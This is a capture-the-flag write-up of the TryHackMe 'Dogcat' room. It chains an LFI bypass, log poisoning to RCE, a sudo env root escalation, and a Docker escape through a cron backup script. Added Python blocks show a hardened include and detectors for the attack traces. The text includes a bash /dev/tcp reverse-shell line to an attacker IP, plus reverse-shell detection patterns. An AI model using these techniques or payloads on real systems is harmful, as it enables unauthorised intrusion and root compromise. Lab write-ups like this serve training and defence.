
TryHackMe: Dogcat


Enumeration

Started by checking what ports are open:

root@osboxes:~/Documents/dogcat# cat scan.txt 
[*] OS based on TTL
Linux
[*] TCP Scan
Open ports: 22,80
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 24:31:19:2a:b1:97:1a:04:4e:2c:36:ac:84:0a:75:87 (RSA)
|   256 21:3d:46:18:93:aa:f9:e7:c9:b5:4c:0f:16:0b:71:e1 (ECDSA)
|_  256 c1:fb:7d:73:2b:57:4a:8b:dc:d7:6f:49:bb:3b:d0:20 (ED25519)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: dogcat
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
[*] Execution time:
	 TTL: 0
	 Furious: 48
	 Nmap: 13
	 Total: 61

User

Then opened the website and saw a possible LFI attack vector:
[Screenshot: LFI attack vector]

Tried opening /etc/passwd but “only dogs or cats are allowed”:
[Screenshot: "only dogs or cats are allowed" response]

Then tried opening it again with “cat” included in the path and a null byte appended:
[Screenshot: null-byte LFI bypass]

It seems that it is using something similar to:

<?php
    // Guessed logic: the view name comes straight from the request and ".php" is appended to it
    include($_GET["view"] . ".php");
?>
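The guessed include above, together with the “only dogs or cats are allowed” message, points at a substring check on the view parameter. The Python below is an added model of that logic, not the room's PHP: `weak_filter` and `weak_include_target` reproduce the behaviour the writeup runs into, so a value that merely contains “cat” (plus a null byte, or an empty extension) passes, while `hardened_include_target` shows the fix: an exact allowlist, a server-side extension, and a check that the normalised path still sits under the views root. The document root /var/www/html and the two view names are assumptions.

```python
import os
from pathlib import Path
from typing import Optional

# Assumed document root and view names (not taken from the room's source).
VIEWS_ROOT = "/var/www/html"
ALLOWED_VIEWS = {"dog", "cat"}


def weak_filter(view: str) -> bool:
    """Substring check of the kind the “only dogs or cats are allowed”
    message suggests: any value that merely contains 'dog' or 'cat' passes."""
    return "dog" in view or "cat" in view


def weak_include_target(view: str, ext: str = ".php") -> Optional[str]:
    """Models include($_GET['view'] . $ext): the extension is appended, but a
    request-controlled ext (or a null byte) removes that constraint."""
    if not weak_filter(view):
        return None
    return view + ext


def hardened_include_target(view: str, root: str = VIEWS_ROOT) -> Optional[Path]:
    """Resolve a view name to a file only if it passes three independent checks."""
    # 1. Exact match against an allowlist, not a substring test.
    if view not in ALLOWED_VIEWS:
        return None
    # 2. The extension is fixed server-side; the request cannot override it.
    candidate = os.path.normpath(os.path.join(root, view + ".php"))
    # 3. Defence in depth: the normalised path must still sit under the root,
    #    so even a future allowlist mistake cannot escape the views directory.
    root_norm = os.path.normpath(root)
    if os.path.commonpath([root_norm, candidate]) != root_norm:
        return None
    return Path(candidate)


if __name__ == "__main__":
    # Constructed inputs: a normal view and the traversal the writeup describes.
    for v in ["cat", "../../../../etc/passwd", "cat/../../../../etc/passwd\x00"]:
        print(repr(v), "weak ->", weak_include_target(v, ext=""),
              "| hardened ->", hardened_include_target(v))
```

Note that the weak filter also lets through names such as "catalog"; the allowlist version rejects anything that is not literally one of the two views.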

Used the php://filter wrapper to show the content of index.php base64-encoded:
[Screenshot: php://filter base64 output]

Decoded the string and got the source code:
[Screenshot: index.php source]

We can use the ext parameter to avoid “.php” being appended. Then performed an Apache log poisoning attack to upgrade the LFI to RCE:
[Screenshot: Apache log poisoning]

URL-encoded a reverse shell and then executed it through that RCE:
[Screenshot: URL-encoded reverse shell]
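On the defensive side, each step of the chain above (the php://filter wrapper, the traversal with a null byte, a PHP tag planted in the User-Agent, and the ext= override) leaves a distinct trace in the Apache access log. The Python below is an added example, not part of the writeup: it parses combined-format log lines, URL-decodes the request target and User-Agent, and tags each line with the indicators it contains. The log lines are constructed for this example; the planted User-Agent is a bare marker that only shows the pattern a detection should match.

```python
import re
from typing import List, Tuple
from urllib.parse import parse_qs, unquote, urlsplit

# Apache combined log format: ip ident user [time] "request" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Constructed access-log lines modelled on the chain in the writeup (timestamps invented).
SAMPLE_LOG = [
    '10.9.31.216 - - [05/Aug/2020:13:40:01 +0000] "GET /?view=dog HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.9.31.216 - - [05/Aug/2020:13:40:05 +0000] "GET /?view=php://filter/convert.base64-encode/resource=index HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    '10.9.31.216 - - [05/Aug/2020:13:40:09 +0000] "GET /?view=cat/../../../../etc/passwd%00 HTTP/1.1" 200 100 "-" "Mozilla/5.0"',
    '10.9.31.216 - - [05/Aug/2020:13:40:12 +0000] "GET / HTTP/1.1" 200 512 "-" "<?php echo 1; ?>"',
    '10.9.31.216 - - [05/Aug/2020:13:40:15 +0000] "GET /?view=cat/../../../../var/log/apache2/access.log&ext= HTTP/1.1" 200 900 "-" "Mozilla/5.0"',
]


def indicators(line: str) -> List[str]:
    """Return the LFI/log-poisoning indicators present in one log line."""
    m = LOG_RE.match(line)
    if not m:
        return ["unparsed"]
    # Decode once so %2e%2e%2f, %00 and similar are caught as well as literal forms.
    target = unquote(m["target"])
    ua = unquote(m["ua"])
    found = []
    if "php://" in target.lower():
        found.append("php_wrapper")      # stream wrapper used to read source
    if "../" in target:
        found.append("traversal")        # directory traversal in the view value
    if "\x00" in target:
        found.append("null_byte")        # null byte to cut off the appended extension
    if "<?php" in (target + ua).lower():
        found.append("php_tag")          # PHP code planted where it will be logged
    if "ext" in parse_qs(urlsplit(target).query, keep_blank_values=True):
        found.append("ext_override")     # extension parameter supplied by the client
    return found


def scan(lines: List[str]) -> List[Tuple[int, List[str]]]:
    """(line number, indicators) for every line that triggers at least one indicator."""
    hits = []
    for n, line in enumerate(lines, start=1):
        found = indicators(line)
        if found:
            hits.append((n, found))
    return hits


if __name__ == "__main__":
    for n, found in scan(SAMPLE_LOG):
        print(n, found)
```

A single indicator such as "traversal" is worth an alert on its own; the sequence wrapper, traversal, php_tag, ext_override from one source address is the whole LFI-to-RCE chain and should be triaged as a likely compromise of the web server.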

Root

Checked whether www-data has any sudo permissions:

www-data@bc2d166cba99:/var/www/html$ sudo -l
Matching Defaults entries for www-data on bc2d166cba99:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User www-data may run the following commands on bc2d166cba99:
    (root) NOPASSWD: /usr/bin/env

We can get a shell using /usr/bin/env according to GTFOBins:

www-data@bc2d166cba99:/var/www/html$ sudo env /bin/sh
# id
uid=0(root) gid=0(root) groups=0(root)

Docker

Used linpeas to enumerate how to get the 4th flag (since we are inside a Docker container):
[Screenshot: linpeas.sh output]

It seems that there is a cron job on the real host that creates backups using /opt/backups/backup.sh:

root@d4871bd286e0:/opt/backups# ls -l
total 5884
-rwxr--r-- 1 root root     111 Aug  5 12:09 backup.sh
-rw-r--r-- 1 root root 6021120 Aug  5 13:31 backup.tar
root@d4871bd286e0:/opt/backups# cat backup.sh
cat backup.sh
#!/bin/bash
tar cf /root/container/backup/backup.tar /root/container

Appended a reverse shell at the end of the file:

root@d4871bd286e0:/opt/backups# echo "bash -i >& /dev/tcp/10.9.31.216/5555 0>&1" >> backup.sh
root@d4871bd286e0:/opt/backups# cat backup.sh
#!/bin/bash
tar cf /root/container/backup/backup.tar /root/container
bash -i >& /dev/tcp/10.9.31.216/5555 0>&1
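The escape works because backup.sh lives on a path the container can write to while the host's cron runs it as root. As an added example (not from the writeup or the room), the Python below shows two checks a host-side wrapper or a monitoring job could run before and around such a script: refuse to execute it when its SHA-256 differs from a recorded baseline, and report which lines were added and whether any of them match a reverse-shell pattern. The baseline content is the script shown above; the tampered copy is the same script with the line the writeup appended.

```python
import hashlib
import hmac
import re
from typing import List, Tuple

# Baseline: the script as shown in the writeup before it was modified.
BASELINE_SCRIPT = (
    "#!/bin/bash\n"
    "tar cf /root/container/backup/backup.tar /root/container\n"
)
# Tampered copy: the same script with the reverse-shell line appended.
TAMPERED_SCRIPT = BASELINE_SCRIPT + "bash -i >& /dev/tcp/10.9.31.216/5555 0>&1\n"

# Patterns typical of shell-based reverse connections (a small, illustrative set).
SUSPICIOUS_PATTERNS = [
    re.compile(r"/dev/tcp/"),
    re.compile(r"\bbash\s+-i\b"),
    re.compile(r"\bnc\b.*\s-e\s"),
]


def sha256_of(text: str) -> str:
    return hashlib.sha256(text.encode()).hexdigest()


def should_run(current: str, expected_digest: str) -> bool:
    """Gate the cron job on the script matching its recorded hash."""
    return hmac.compare_digest(sha256_of(current), expected_digest)


def unexpected_lines(current: str, baseline: str) -> List[str]:
    """Lines present now that were not in the baseline, in file order."""
    known = set(baseline.splitlines())
    return [line for line in current.splitlines() if line not in known]


def suspicious_lines(script: str) -> List[Tuple[int, str]]:
    """(line number, text) for lines matching a reverse-shell pattern."""
    hits = []
    for n, line in enumerate(script.splitlines(), start=1):
        if any(p.search(line) for p in SUSPICIOUS_PATTERNS):
            hits.append((n, line))
    return hits


if __name__ == "__main__":
    baseline_digest = sha256_of(BASELINE_SCRIPT)
    print("baseline may run:", should_run(BASELINE_SCRIPT, baseline_digest))
    print("tampered may run:", should_run(TAMPERED_SCRIPT, baseline_digest))
    print("added lines:", unexpected_lines(TAMPERED_SCRIPT, BASELINE_SCRIPT))
    print("suspicious:", suspicious_lines(TAMPERED_SCRIPT))
```

The hash gate is the control that actually stops the escape; the pattern scan only explains what changed. Keeping the recorded digest and the wrapper itself outside any directory shared with the container is what makes the gate meaningful.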

And got the shell:

root@osboxes:~/Documents/dogcat# rlwrap nc -lvnp 5555
listening on [any] 5555 ...
connect to [10.9.31.216] from (UNKNOWN) [10.10.32.79] 48636
bash: cannot set terminal process group (5306): Inappropriate ioctl for device
bash: no job control in this shell
root@dogcat:~# ls
container
flag4.txt
root@dogcat:~# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 9001 qdisc fq_codel state UP group default qlen 1000
    link/ether 02:5f:6d:d3:53:60 brd ff:ff:ff:ff:ff:ff
    inet 10.10.32.79/16 brd 10.10.255.255 scope global dynamic eth0
       valid_lft 2719sec preferred_lft 2719sec
    inet6 fe80::5f:6dff:fed3:5360/64 scope link 
       valid_lft forever preferred_lft forever
3: docker0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default 
    link/ether 02:42:58:bd:55:be brd ff:ff:ff:ff:ff:ff
    inet 172.17.0.1/16 brd 172.17.255.255 scope global docker0
       valid_lft forever preferred_lft forever
    inet6 fe80::42:58ff:febd:55be/64 scope link 
       valid_lft forever preferred_lft forever
5: veth8e8f886@if4: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue master docker0 state UP group default 
    link/ether 2a:07:5a:c8:77:b0 brd ff:ff:ff:ff:ff:ff link-netnsid 0
    inet6 fe80::2807:5aff:fec8:77b0/64 scope link 
       valid_lft forever preferred_lft forever

WRITTEN BY
ITasahobby
InTernet lover